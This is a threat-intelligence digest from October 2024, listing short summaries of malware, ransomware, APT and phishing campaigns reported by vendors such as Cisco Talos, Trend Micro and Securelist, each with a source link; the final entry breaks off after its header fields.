Summary:: Researchers from Cisco Talos have uncovered the threat group named TA866 also known as Asylum Ambuscade. This group has been active since 2020 and conducts financially motivated and espionage-related cyber operations. TA866 primarily targets organizations in the U.S., U.K., Europe and Canada especially in manufacturing, government, and finance sectors. The attacker often uses the tactic of malspam emails or malicious advertisements to trick victims into downloading malware. TA866 uses tools like WasabiSeed, ScreenShotter, and AHK Bot along with advanced payloads like the Resident backdoor, CSharp-Streamer-RAT, Cobalt Strike, and Rhadamanthys malware. These tools allow them to gather information and maintain control over compromised systems.

Source: https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/

Intel Source:: Cisco Talos

Intel Name:: WarmCookie_Malware

Date of Scan:: 2024-10-23

Impact:: MEDIUM

Summary:: Cisco Talos researchers have identified a malware called WarmCookie also known as BadSpace that emerged in April 2024. This malware is being distributed through malspam and malvertising campaigns. WarmCookie provides attackers with initial access to systems, maintaining persistence, and performing various malicious activities such as deploying payloads, executing commands, manipulating files, and taking screenshots. These capabilities help attackers to maintain long-term control over compromised networks after gaining initial access. The malware distribution starts with email-based campaigns where attackers use lures such as fake invoices or job offers to trick victims into clicking on malicious links. Alternatively, WarmCookie can also be delivered via malvertising campaigns where infected ads redirect users to malware-hosting sites.

Source: https://blog.talosintelligence.com/warmcookie-analysis/

Intel Source:: SOC Radar

Intel Name:: Roundcube_Vulnerability_Fuels_Phishing_Attacks

Date of Scan:: 2024-10-23

Impact:: LOW

Summary:: A recently identified vulnerability in the open-source Roundcube Webmail, designated CVE-2024-37383, has been exploited by threat actors for phishing attacks aimed at stealing user credentials. Despite being patched, this stored XSS vulnerability poses ongoing risks for targeted exploitation. In June 2024, it was notably used in phishing campaigns against government organizations in the Commonwealth of Independent States (CIS), with attackers embedding hidden payloads in seemingly benign email attachments.

Source: https://socradar.io/roundcube-vulnerability-cve-2024-37383-exploited-in-phishing-attacks-targeting-government-agencies-for-credential-theft/

Intel Source:: Any.Run

Intel Name:: DarkComet_Exploits_in_Cyberattacks

Date of Scan:: 2024-10-23

Impact:: LOW

Summary:: Researchers at Any Run have discovered DarkComet RAT as a stealthy, feature-rich malware used in targeted attacks. It allows remote system control, data theft, and malware installation while avoiding detection by modifying files and registry keys. DarkComet collects system information, communicates with a C2 server, and executes commands such as keystroke logging and display control, making it highly versatile for attackers.

Source: https://any.run/cybersecurity-blog/darkcomet-rat-technical-analysis/

Intel Source:: CERT-UA

Intel Name:: Cyberattack_Targeting_Ukraine_State_Entities

Date of Scan:: 2024-10-23

Impact:: LOW

Summary:: On October 22, 2024, Ukraine's CERT-UA reported a mass phishing campaign targeting state authorities, key industries, and military formations. The emails, purportedly about integration with Amazon services and Microsoft’s zero trust architecture, included RDP configuration files. Opening these files would establish an outgoing RDP connection to attackers’ servers, potentially granting them extensive access to victims' local resources and the ability to execute third-party scripts. Investigations suggest that preparations for these cyberattacks began as early as August 2024, and the threat appears to be widespread based on related domain activities.

Source: https://cert.gov.ua/article/6281076

Intel Source:: ESET

Intel Name:: Embargo_Ransomware

Date of Scan:: 2024-10-23

Impact:: MEDIUM

Summary:: ESET researcher have discovered a new ransomware group called Embargo that first appeared in May 2024. This group uses rust-based programming language for its ransomware payload and target both Windows and Linux. Their tools include MDeployer, a malicious loader that deploys the ransomware and MS4Killer, an EDR killer for disabling the security software. They mainly target U.S based organisation by using tactics like disabling security measures in Safe Mode to carry out their attacks. They operate as a RaaS provider and offer their ransomware tools to affiliates like other gang members. Embargo uses double extorsion tactic which threaten to victim for publishing the stolen data unless ransom is not paid.

Source: https://www.welivesecurity.com/en/eset-research/embargo-ransomware-rocknrust/

Intel Source:: Securelist

Intel Name:: Grandoreiro_Targets_Beyond_Banking

Date of Scan:: 2024-10-23

Impact:: LOW

Summary:: Resarcher from Securelist have discovered that Brazilian banking trojans, such as Grandoreiro, are spreading globally, filling the void left by ransomware-focused Eastern European gangs. As desktop banking falls, Grandoreiro targets businesses and governments. Its operators constantly alter strategies to avoid detection, and Securelist collaborates with INTERPOL and other organizations to tackle the threat.

Source: https://securelist.com/grandoreiro-banking-trojan/114257/

Intel Source:: Trend Micro

Intel Name:: Unmasking_Prometei_Botnet

Date of Scan:: 2024-10-23

Impact:: LOW

Summary:: Trend Micro researchers have uncovered the Prometei botnet which has been active since 2016. The malware performs malicious activities like mining Monero cryptocurrency and stealing credentials. It operates by exploiting vulnerabilities such as BlueKeep and Microsoft Exchange Server flaws to gain access. Prometei uses PowerShell scripts to download additional malicious files and maintain persistence. This botnet employs domain generation algorithm (DGA) for controlling infected systems remotely. It has infected over 10,000 systems across countries like Brazil, Indonesia, and Turkey.

Source: https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html

Intel Source:: Netskope

Intel Name:: Bumblebee_Malware_Returns

Date of Scan:: 2024-10-22

Impact:: MEDIUM

Summary:: Bumblebee is sophisticated malware used by cybercriminals to infiltrate corporate networks and deploy additional payloads like Cobalt Strike beacons and ransomware. Discovered by the Google Threat Analysis Group in March 2022, it recently resurfaced in a new infection chain identified by Netskope Threat Labs. This campaign marks the first instance of Bumblebee activity since Europol's Operation Endgame in May 2024, which targeted major botnets. The infection typically begins with a phishing email prompting the victim to download a ZIP file containing an LNK file, which, when executed, triggers the Bumblebee payload download directly into memory, bypassing disk storage.

Source: https://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence

Intel Source:: VMRAY

Intel Name:: Emergence_of_Latrodectus

Date of Scan:: 2024-10-22

Impact:: LOW

Summary:: Latrodectus, a new malware first discovered in October 2023, functions primarily as a loader/downloader and has emerged as a successor to the notorious IcedID loader, which was dismantled in May 2024 through an international operation led by Europol. Following this crackdown, Latrodectus has rapidly evolved, with its developers releasing multiple new versions featuring minor changes and even removing existing functionalities. This iterative development aims to stay ahead in the ongoing battle between cybersecurity defenders and threat actors.

Source: https://www.vmray.com/latrodectus-a-year-in-the-making/

Intel Source:: SentinelOne

Intel Name:: MacOS_NotLockBit_Ransomware

Date of Scan:: 2024-10-22

Impact:: MEDIUM

Summary:: Sentinel researchers have observed several samples of ransomware targeting macOS called NotLockBit. It is written in the Go programming language and works only on Intel Macs or newer Apple silicon Macs with Rosetta emulation software. The ransomware collects system information such as the product name of machine, version, architecture, and uptime. It drops a README.txt file with ransom instructions in every folder containing encrypted files and changes the desktop wallpaper to a LockBit 2.0 banner although LockBit has moved to version 3.0. It is believed that these attackers are not from Lockbit. NotLockBit also uses Amazon S3 cloud storage to exfiltrate victim data before locking files.

Source: https://www.sentinelone.com/blog/macos-notlockbit-evolving-ransomware-samples-suggest-a-threat-actor-sharpening-its-tools/

Intel Source:: DoublePulsar

Intel Name:: ESET_Impersonated_in_Phishing_Attack_on_Israel

Date of Scan:: 2024-10-22

Impact:: LOW

Summary:: Hackers have been impersonating ESET's cybersecurity firm in a phishing campaign targeting Israeli organizations. They sent malicious emails warning recipients about state-backed hackers and offering a fake ESET Unleashed program to combat the threat. Clicking the link led to a ZIP file containing wiper malware designed to erase data from infected devices. Security researchers have highlighted that the attackers had breached ESET’s defenses, with the malware hosted on their servers. Although Google flagged the emails as dangerous, many users fell for the ruse. ESET has denied any direct compromise, attributing the incident to partner involvement.

Source: https://doublepulsar.com/eiw-eset-israel-wiper-used-in-active-attacks-targeting-israeli-orgs-b1210aed7021

Intel Source:: Trend Micro

Intel Name:: Docker_API_Targeted_for_Cryptominer_Attack

Date of Scan:: 2024-10-22

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered a cryptomining attack against Docker remote API servers, in which the threat actor leveraged the gRPC protocol over HTTP/2 cleartext (h2c) to avoid security safeguards. The attacker initially examined the availability and version of the Docker API before upgrading to gRPC/h2c to modify Docker functionality. They installed the SRBMiner cryptominer from GitHub, which mined XRP cryptocurrency for their wallet and public IP.

Source: https://www.trendmicro.com/en_us/research/24/j/using-grpc-http-2-for-cryptominer-deployment.html

Intel Source:: Cisco Talos

Intel Name:: PowerRAT_and_DCRAT_Deliver_Through_Gophish

Date of Scan:: 2024-10-22

Impact:: LOW

Summary:: Cisco Talos researchers have discovered a phishing campaign in which attackers are using open-source toolkit called Gophish. The attacker is targeting Russian-speaking users based on the language in phishing emails and by creating a fake VKontakte webpage, a popular social media platform among users in Russia, Ukraine, Belarus, Kazakhstan, Uzbekistan, and Azerbaijan. The Phishing emails contain Word documents (Maldocs) or HTML files to trick victims into triggering the malware like PowerRAT and DCRAT. PowerRAT is capable of collecting information such as the username, computer name, and drive serial number then sends to C2 server. Additionally, DCRAT deliver through HTML-based infection method and capable to control the victim's computer remotely, execute commands, steal sensitive data, capture screenshots, and even log keystrokes.

Source: https://blog.talosintelligence.com/gophish-powerrat-dcrat/

Intel Source:: Walmart Global Tech Blog

Intel Name:: IcedID_Campaign_Analysis_and_Findings

Date of Scan:: 2024-10-22

Impact:: LOW

Summary:: Researchers investigated the IcedID campaign utilizing GitLab and revealed a sample with overlapping imphash characteristics with another sample, communicating with a different domain. Upon unpacking, the sample exhibited strings indicative of a system and network profiler, but most were encoded. The decoding process involved extracting the string length from the first six bytes, with an initial XOR seed followed by a PRNG-like function to decode the strings.

Source: https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39

Intel Source:: Elastic Labs

Intel Name:: GHOSTPULSE_Malware

Date of Scan:: 2024-10-21

Impact:: LOW

Summary:: Elastic labs researchers have identified a malware called GHOSTPULSE also known as HIJACKLOADER or IDATLOADER first discovered in 2023. This malware is capable of hiding its configuration and payload within the pixels of the image itself and extract the information from the colours in the image. In recent GHOSTPULSE campaigns where attackers trick victims by presenting a fake CAPTCHA validation on a website that instruct the user to perform specific Windows keyboard shortcuts which leads to the execution of malicious commands such as a PowerShell script that downloads and runs the GHOSTPULSE payload.

Source: https://www.elastic.co/security-labs/tricks-and-treats

Intel Source:: qualys

Intel Name:: Lumma_Stealer_Targets_Data_with_CAPTCHA

Date of Scan:: 2024-10-21

Impact:: LOW

Summary:: Researchers from Qualys have found a fraudulent Lumma Stealer campaign that uses bogus CAPTCHA verification to deploy malware. Lumma Stealer, an information-stealing malware available through Malware-as-a-Service (MaaS), collects sensitive data such as passwords, browser credentials, and cryptocurrency wallet information.

Source: https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha

Intel Source:: Securelist

Intel Name:: Kral_and_Vidar_Stealers_on_the_Rise

Date of Scan:: 2024-10-21

Impact:: LOW

Summary:: Researchers from Securelist have discovered a substantial rise in the spread of information stealers, which are used by cybercriminals to collect credentials for sale on the dark web or to launch more attacks. These threats affected over ten million devices in 2023. Among the significant results, the Kral stealer, which is tied to the Kral downloader, targets cryptocurrency wallets and browser data, as AMOS targets macOS users. Vidar, which has spread through YouTube comments, raises extra concerns.

Source: https://securelist.com/kral-amos-vidar-acr-stealers/114237/

Intel Source:: Phylum

Intel Name:: Trojanized_npm_Packages_Stealing_ETH_Keys

Date of Scan:: 2024-10-21

Impact:: LOW

Summary:: Researchers at Phylum have discovered a complicated attack combining trojanized Ethereum-related packages on npm, which was designed to steal private keys and acquire unauthorized SSH access. These packages hide malware behind multiple layers of indirection, taking advantage of the modularity of the genuine ethers library. The attack extracts Ethereum keys via a series of files while also altering the SSH authorized_keys file to add the attacker's public key.

Source: https://blog.phylum.io/trojanized-ethers-forks-on-npm-attempting-to-steal-ethereum-private-keys/

Intel Source:: QiAnXin

Intel Name:: Mysterious_Elephant_Group_Targeting_South_Asia

Date of Scan:: 2024-10-21

Impact:: LOW

Summary:: Qianxin researchers have analyzed the activities of the Mysterious Elephant organization, a South Asian APT group identified by Kaspersky in 2023. It highlights their use of a new backdoor named ORPCBackdoor, originally attributed to the Bitter organization. This attribution confusion stems from similarities in attack methods and shared infrastructure. Recent discoveries include CHM files disguised as PDFs containing C# backdoors, targeting entities in Pakistan and other South Asian countries.

Source: https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247512794&idx=1&sn=f41a6a721180828aead94ba761b628bb&chksm=ea6645addd11ccbb0bcc218364f0b2f3e69d66f5df9c96a4b8b9804700b05b6423d89376cb98&scene=178&cur_album_id=1539799351089283075

Intel Source:: Trend Micro

Intel Name:: Docker_Remote_API_Servers_With_Perfctl_Malware

Date of Scan:: 2024-10-21

Impact:: LOW

Summary:: Researchers from Trend Micro have discovered the exploitation of vulnerable Docker Remote API servers to deploy the malware called perfctl that includes scanning for open servers and executing malicious code. The attack starts with the creating of a Docker container with specific configurations and running a payload which enables the attacker to create a malicious script, set environment variables and downloads a malicious PHP file. The attackers also employ techniques like checking for similar processes, creating directories and using a custom function to download files.

Source: https://www.trendmicro.com/en_us/research/24/j/attackers-target-exposed-docker-remote-api-servers-with-perfctl-.html

Intel Source:: Forcepoint

Intel Name:: Analysis_of_Latrodectus_Malware_Campaign

Date of Scan:: 2024-10-21

Impact:: MEDIUM

Summary:: Researchers at Forcepoint have analyzed the Latrodectus campaign activities, highlighting its use of phishing emails and IcedID infrastructure to target the financial, automotive, and healthcare sectors. The campaign primarily involves compromising email accounts to spread malicious attachments, such as HTML and PDF files, designed for stealth and persistence. This makes detection and eradication challenging. Attackers typically initiate the campaign by sending emails that appear to contain important DocuSign documents, tricking users into clicking a link that redirects them to a malicious URL, and downloading harmful payloads.

Source: https://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign

Intel Source:: Hunt.IO

Intel Name:: Analysis_of_Updated_WarmCookie_Infrastructure

Date of Scan:: 2024-10-18

Impact:: LOW

Summary:: Hunt.IO researchers have analyzed WarmCookie's updated infrastructure and uncovered key indicators, linked servers, and potential overlaps with other malware, like DarkGate.

Source: https://hunt.io/blog/from-warm-to-burned-shedding-light-on-updated-warmcookie-infrastructure

Intel Source:: ZScaler

Intel Name:: Copybara_Technical_Analysis

Date of Scan:: 2024-10-18

Impact:: LOW

Summary:: Zscaler ThreatLabz recently analyzed a new variant of Copybara, which is an Android malware family that emerged in November 2021. The malware is primarily spread through voice phishing (vishing) attacks, where victims receive instructions over the phone to install the Android malware. This new variant of Copybara has been active since November 2023, and utilizes the MQTT protocol to establish communication with its command-and-control (C2) server. The malware abuses the Accessibility Service feature that is native to Android devices to exert granular control over the infected device. In the background, the malware also proceeds to download phishing pages that imitate popular cryptocurrency exchanges and financial institutions with the use of their logos and application names. These pages are designed to deceive victims into entering their credentials, which can then be stolen by the malware.

Source: https://threatlabz.zscaler.com/blogs/security-research/technical-analysis-copybara

Intel Source:: Cyble

Intel Name:: Vietnamese_Threat_Actor_Hits_Job_Seekers

Date of Scan:: 2024-10-18

Impact:: LOW

Summary:: Researchers from Cyble have discovered a complex multi-stage malware campaign launched by a Vietnamese threat actor that targeted job seekers and digital marketing professionals, specially those working with Meta Ads. This attack begins with a malicious LNK file in phishing emails, which leads to the installation of Quasar RAT, which grants complete system control.

Source: https://cyble.com/blog/vietnamese-threat-actors-multi-layered-strategy-on-digital-marketing-professionals/

Intel Source:: Securelist

Intel Name:: Analysis_of_Crypt_Ghouls_Group

Date of Scan:: 2024-10-18

Impact:: LOW

Summary:: Securelist researchers identified a new ransomware group named "Crypt Ghouls" targeting Russian businesses and government agencies. This group utilizes a range of tools, including Mimikatz, AnyDesk, and PsExec, and employs the ransomware strains LockBit 3.0 and Babuk as their final payloads. Investigations revealed that initial access was often gained through compromised contractor login information via VPN connections, originating from IPs linked to a Russian hosting provider.

Source: https://securelist.com/crypt-ghouls-hacktivists-tools-overlap-analysis/114217/

Intel Source:: Cybereason

Intel Name:: The_Beast_Ransomware

Date of Scan:: 2024-10-18

Impact:: MEDIUM

Summary:: Cybereason researchers have discovered a RaaS group called Beast Ransomware that has been active since 2022 and targeting Windows, Linux, and ESXi systems. Beast uses Elliptic-curve and ChaCha20 encryption methods and customize ransomware for different targets. It also deletes system backups to prevent recovery. They spread ransomware through phishing emails and exploiting vulnerabilities. It can stop services and processes to unlock files prior to encryption.

Source: https://www.cybereason.com/blog/threat-analysis-beast-ransomware

Intel Source:: Esentire

Intel Name:: BeaverTail_Malware

Date of Scan:: 2024-10-18

Impact:: LOW

Summary:: ESentire researchers have investigated an incident where developer downloaded a malicious project named nft_marketplace-main from GitHub which contain the BeaverTail malware. This malware downloads a Python executable and related files from a remote server using a cURL command to initiate the InvisibleFerret backdoor. The technique is similar to those previously attributed to North Korean threat actors, also known as Contagious Interview. These actors often target victims such as software developer, a common focus of North Korean threat actors through phishing emails or LinkedIn interaction.

Source: https://www.esentire.com/blog/bored-beavertail-yacht-club-a-lazarus-lure

Intel Source:: Group-IB

Intel Name:: Cicada3301_The_RaaS_Group

Date of Scan:: 2024-10-17

Impact:: MEDIUM

Summary:: Researchers at Group IB have identified the RaaS group called Cicada3301 which first appeared in June 2024. This group primarily targets critical organisation in the USA and the UK. The Cicada group uses Rust programming language and target various operating systems such as Window, Linux, ESXi and platform like NAS. They hire cybercriminals and provide them commission. The group uses advanced encryption techniques like ChaCha20 and RSA encryption that allow for both full and partial file encryption. Additionally, the group employs aggressive tactics, shutting down virtual machines, deleting backups, and terminating critical services to maximize disruption.

Source: https://www.group-ib.com/blog/cicada3301/

Intel Source:: Securelist

Intel Name:: Horns_Hooves_Campaign

Date of Scan:: 2024-10-17

Impact:: LOW

Summary:: Securelist researcher have uncovered a campaign called Horns&Hooves which has been active since March 2023. The primary targets of this campaign are private users, retailers, and service companies in Russia. In this campaign, the attackers send phishing emails containing ZIP archives with malicious JS files disguised as legitimate docs like Requests for Prices or Proposals. These emails trick user into downloading and installing NetSupport RAT, a tool that gives attackers full remote access to the victim's computer. Once the attackers gain the access then they steal sensitive information or sell the access to other cybercriminals. The campaign is believed to be linked to a known hacking group TA569 based on shared code and configuration files.

Source: https://securelist.ru/horns-n-hooves-campaign-delivering-netsupport-rat/110772/

Intel Source:: Palo Alto

Intel Name:: Top_Level_Domains_for_Cybersquatting

Date of Scan:: 2024-10-17

Impact:: LOW

Summary:: Palo researchers have identified a Top-Level Domains (TLD) for cybersquatting and redirection. The attackers also added two more domain .diy and .food to the TDS list. Initially they were using the domain choto[.]xyz as a Traffic Direction Service (TDS) but now they shifted to a new domain choto[.]click by using the same TDS paths.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-17-IOCs-for-TLD-CyberSquatting.txt

Intel Source:: Nao-sec

Intel Name:: IcePeony_APT_Group

Date of Scan:: 2024-10-17

Impact:: MEDIUM

Summary:: Nao_sec researcher have discovered a newly identified China-linked advanced persistent threat (APT) group called IcePeony that has been active since at least 2023. They mainly target government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam. Their attacks usually begin with SQL Injection, then they take control of systems by installing webshell and backdoors. They also use a unique malware for IIS servers called IceCache. Their malware IceCache enables file transmission, proxy management, and command execution on infected servers. Additionally, they developed a simpler backdoor Ice Event for more basic system compromises.

Source: https://nao-sec.org/

Intel Source:: Cisco Talos

Intel Name:: New_Wave_of_Attacks_by_UAT_5647_Targeting_Ukraine

Date of Scan:: 2024-10-17

Impact:: LOW

Summary:: Cisco Talos researchers have identified a new wave of attacks by the Russian-speaking group UAT-5647, also known as RomCom, which has been targeting Ukrainian government entities and unknown Polish organizations since late 2023. The attacks feature an updated version of RomCom malware, dubbed SingleCamper, which loads directly from the registry into memory and communicates using a loopback address.

Source: https://blog.talosintelligence.com/uat-5647-romcom/

Intel Source:: 360 Advanced Threat Research Institute

Intel Name:: Diving_Deep_into_APT_C_35

Date of Scan:: 2024-10-17

Impact:: LOW

Summary:: APT-C-35, also known as Donot, is a South Asian APT group that has been active since 2016, primarily targeting government agencies in Pakistan and neighboring countries to steal sensitive information. Recently, the 360 Advanced Threat Research Institute identified an increase in the group's activities, noting the use of macro documents and vulnerability documents as malicious carriers to deploy a new .NET attack component. This component is rare in previous attacks and is still under development.

Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247501270&idx=1&sn=203ae98a60ffc172cb9e06a1b95116c6&chksm=f9c1f6dfceb67fc916f29b04e9e63fe81a1f916d575ae8c32250fb954ca9619153ba864e118d&scene=178&cur_album_id=1955835290309230595

Intel Source:: Cyfirma

Intel Name:: Evolving_Landscape_of_Stealers

Date of Scan:: 2024-10-17

Impact:: LOW

Summary:: Cyfirma researchers have examined the evolving malware landscape, particularly focusing on various stealers like Divulge, DedSec, and Duck. These malware variants are often advertised on platforms such as GitHub, where developers may either modify open-source versions or create new ones targeting sensitive information from browsers and games.

Source: https://www.cyfirma.com/research/the-will-of-d-a-deep-dive-into-divulge-stealer-dedsec-stealer-and-duck-stealer/

Intel Source:: Sekoia

Intel Name:: ClickFix_Tactic_Targets_Google_Meet_Users

Date of Scan:: 2024-10-17

Impact:: MEDIUM

Summary:: Researchers from Sekoia have discovered the ClickFix social engineering approach in May 2024. It uses fraudulent error messages to lure users into running malicious PowerShell scripts that spread malware such as Matanbuchus and DarkGate. Fake Google Meet pages target both Windows and MacOS, evading browser security measures. Sekoia researchers connected this strategy to cybercrime gangs Slavic Nation Empire (SNE) and Scamquerteo, who mostly targeted cryptocurrency and Web3 users.

Source: https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/

Intel Source:: CERT-UA

Intel Name:: Ukrainian_CERT_Alerts_on_MEDUZASTEALER_Malware

Date of Scan:: 2024-10-16

Impact:: LOW

Summary:: On October 15, 2024, Ukraine's CERT-UA reported suspicious messages from the Telegram account @reserveplusbot, which had previously been associated with Rezerv+ technical support. The messages urged users to install special software and included a ZIP file named RESERVPLUS.zip. However, this archive contained a malicious executable (installer.exe) that, when run, downloaded another executable (install.exe), infecting the system with the MEDUZASTEALER malware. This malware, configured to steal various file types (e.g., .txt, .doc, .pdf) and self-delete, also circumvented software protections by adding its storage directory to Microsoft Defender exclusions using a PowerShell command.

Source: https://cert.gov.ua/article/6281018

Intel Source:: Eversinc33

Intel Name:: Analyzing_the_Snake_Keylogger

Date of Scan:: 2024-10-16

Impact:: LOW

Summary:: Researchers from Eversinc33 have analyzed a malware bazar sample and it is related to Snake Keylogger, an Infostealer, Keylogger and Clipboard-Hijacker that first appeared in 2019 and is quite popular. During unpacking, they face some .NET obfuscation, process injection and more obfuscation to in the end uncover SnakeKeylogge rand get limited access to the threat actor DopeLord's Telegram Bot.

Source: https://eversinc33.com/posts/unpacking-snake-keylogger.html

Intel Source:: Sophos

Intel Name:: The_Growing_Quishing_Threat

Date of Scan:: 2024-10-16

Impact:: LOW

Summary:: Researchers from Sophos have investigated a campaign called Quishing where phishing emails are being sent with QR code in a PDF attachment. The attacker sends spear phishing emails with PDF attachments containing QR codes to several employees. When employee scan the QR code, it redirects them to fake Microsoft login page to steal their credentials and MFA tokens. The phishing page uses an Adversary-in-The-Middle (AiTM) technique to steal both the login credentials and MFA tokens in real-time which enable the attacker to bypass MFA. The attackers leverage a Phishing-as-a-Service platform called ONNX Store which provides tools and infrastructure for such campaigns.

Source: https://news.sophos.com/en-us/2024/10/16/quishing/

Intel Source:: Haxrob

Intel Name:: Linux_FASTCash_Malware_Targets_Payment_Switches

Date of Scan:: 2024-10-16

Impact:: LOW

Summary:: Haxrob researchers have examined a newly identified Linux-based variant of the DPRK attributed FASTCash malware along with background information on payment switches used in financial networks. FASTCash specifically targets payment switches in compromised financial networks, enabling unauthorized cash withdrawals from ATMs.

Source: https://doubleagent.net/fastcash-for-linux/

Intel Source:: Trend Micro

Intel Name:: Ransomware_Abuses_Cloud_Services

Date of Scan:: 2024-10-16

Impact:: MEDIUM

Summary:: Trend Micro researcher have analyzed that threat actor are leveraging cloud services like Amazon web services(AWS) in their ransomware attacks. These attacks written in Go language and primarily target Window and MacOS. The attackers use amazon S3 buckets to store stolen data and change the victim’s device wallpaper to LockBit-themed wallpaper at the end of the attack to mislead victim that they are targeted by Lockbit.

Source: https://www.trendmicro.com/en_us/research/24/j/fake-lockbit-real-damage-ransomware-samples-abuse-aws-s3-to-stea.html

Intel Source:: Palo Alto

Intel Name:: Fake_Online_shopping_Campaign

Date of Scan:: 2024-10-16

Impact:: LOW

Summary:: Researchers at palo alto have discovered a fake shopping campaign that mimic legitimate e-commerce sites. These fraudulent websites such as Penguin Mall offer only cryptocurrency like Bitcoin (BTC), Ethereum (ETH), and Tether (USDT) as a payment option to make it easier for scammers to steal funds. The recognition of these fake shopping sites includes broken links, unbelievably enticing deals, and poor-quality content. The scammers have re-registered 18 expired domains with similar names. Additionally, these sites not only trick victims into sending cryptocurrency payments but also offer fake loan applications, asking for sensitive personal information like passport details.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-14-IOCs-for-fake-shopping-scam-sites.txt

Intel Source:: ISC.SANS

Intel Name:: Stealthy_Phishing_Using_Blob_URLs_Explained

Date of Scan:: 2024-10-16

Impact:: LOW

Summary:: Researchers at SANS have described a phishing attempt encountered in a catch-all mailbox. The email claims to have an important document pending delivery, prompting the victim to authenticate to access it. Notably, the URL starts with "blob:", indicating using a browser-specific object URL to obscure the true destination and enhance stealth. This technique allows attackers to generate a landing page without a traditional server, making it harder to detect. If victims provide their credentials, they are further prompted for additional personal information.

Source: https://isc.sans.edu/diary/Phishing+Page+Delivered+Through+a+Blob+URL/31350/

Intel Source:: ThreatMon

Intel Name:: X_Zigzag_Rat_Threat_to_Windows

Date of Scan:: 2024-10-16

Impact:: LOW

Summary:: Researchers at ThreatMon have identified a sophisticated malware named X-ZIGZAG RAT on October 5, 2024, specifically targeting Windows systems. Operating entirely in RAM, it evades detection by traditional antivirus software and is capable of stealing sensitive information, executing commands, and capturing screenshots. Notably, it can detect virtual machines and self-terminate to avoid analysis. The malware achieves persistence through the Windows Task Scheduler and is openly available on GitHub, making it accessible to attackers. Its stealth is further enhanced by a self-destruct mechanism.

Source: https://45734016.fs1.hubspotusercontent-na1.net/hubfs/45734016/X-ZIGZAG%20RAT.pdf?__hstc=205617164.4ca88179e9c4de00be257a0ec5f4dee7.1721037753230.1727940935391.1729075378615.11&__hssc=205617164.1.1729075378615&__hsfp=2296146515

Intel Source:: CISA

Intel Name:: Iranian_Cyber_Group_Targets_Critical_Sectors

Date of Scan:: 2024-10-16

Impact:: MEDIUM

Summary:: A Joint advisory has been released by the FBI, CISA, NSA, CSE, AFP, and ACSC warning the organisations about Iranian threat actor targeting critical infrastructure sectors such as healthcare, government, IT, engineering, and energy. The attackers aim to steal credentials and gather information about victim networks which they sell to cybercriminals. These threat actors use Brute force attack technique like password spraying and multifactor authentication (MFA) like push bombing (MFA requests to users until they approve) to compromise user accounts and gain access to organizations. After gaining the access, they explore the network to collect more credentials and find other points of access.

Source: https://www.cisa.gov/sites/default/files/2024-10/aa24-290a-iranian-cyber-actors-conduct-brute-force-and-credential-access-activity.pdf

Intel Source:: QiAnXin

Intel Name:: Detection_of_New_MiyaRat_Malware

Date of Scan:: 2024-10-15

Impact:: MEDIUM

Summary:: The Qi'anxin Threat Intelligence Center have monitored various APT groups in South Asia, and published reports on their activities. Notably, the Bitter organization (APT-Q-37) has relied on outdated techniques like chm and lnk payloads, while attempting to evolve their methods. This year, they tried various strategies, including a new malware called MiyaRat, which was successfully detected. MiyaRat, packaged as an MSI file, connects to a C2 server to exfiltrate information such as disk details, machine names, and system versions. It also supports various malicious functions, including command execution and file management.

Source: https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247512724&idx=1&sn=38ec4601ee12df8b038639ad4b4020f1&chksm=ea6645e3dd11ccf579a0b7c6242eff2151902ad3f444967659ee83dacd08552de84e5a8f0887&scene=178&cur_album_id=1539799351089283075

Intel Source:: Securelist

Intel Name:: SideWinder_APT_Group

Date of Scan:: 2024-10-15

Impact:: MEDIUM

Summary:: Securelist researchers have uncovered a threat actor called SideWinder also known as Rattle Snake which has been active since 2012. This group primarily target government and military, logistics, infrastructure, telecommunication, financial, and oil trading companies across South Asia including Pakistan, Sri Lanka, China, and Nepal. However, the group is expanding its operations to the Middle East and Africa. They also target diplomatic entities in France, China, India and Indonesia. This group often use the spear phishing tactic which contain malicious documents such as word, excel or zip files with hidden malware. They use the spying tool StealerBot that can capture keystrokes, take screenshots, steal sensitive information.

Source: https://securelist.com/sidewinder-apt/114089/

Intel Source:: Trend Micro

Intel Name:: A_Red_Team_Tool_EDRSilencer

Date of Scan:: 2024-10-15

Impact:: LOW

Summary:: Researchers at Trend Micro have recently identified EDRSilencer, a red team tool threat actors exploit to disrupt endpoint detection and response (EDR) solutions. Inspired by the closed-source tool FireBlock, EDRSilencer utilizes the Windows Filtering Platform (WFP) to block network communication for EDR processes, hindering their ability to send alerts or telemetry. This evasion technique makes it challenging to detect and eliminate malware.

Source: https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpoint-security-solutions.html

Intel Source:: Sonicwall

Intel Name:: Horus_Crypter_Spreads_Diverse_Malware_Families

Date of Scan:: 2024-10-15

Impact:: LOW

Summary:: The SonicWall researchers have identified a new Fully Un-Detectable (FUD) malware crypter called Horus, which is being used to spread various malware families, including AgentTesla, Remcos, Snake, and NjRat. The infection chain typically involves malicious files distributed as scripts within archive files, with a notable increase in VBE scripts—encoded VBS scripts that can be decoded using specific tools. Upon execution, these VBE scripts download the necessary payloads from a command-and-control (CnC) server, facilitating the spread of the malware.

Source: https://blog.sonicwall.com/en-us/2024/10/horus-protector-part-2-the-new-malware-distribution-service/

Intel Source:: Harfanglab

Intel Name:: Lumma_Stealer_Intalls_Through_Hijack_Loader

Date of Scan:: 2024-10-15

Impact:: LOW

